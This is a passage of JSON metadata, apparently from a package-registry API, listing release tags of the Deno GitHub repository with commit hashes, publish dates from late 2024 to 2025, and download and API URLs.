ub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5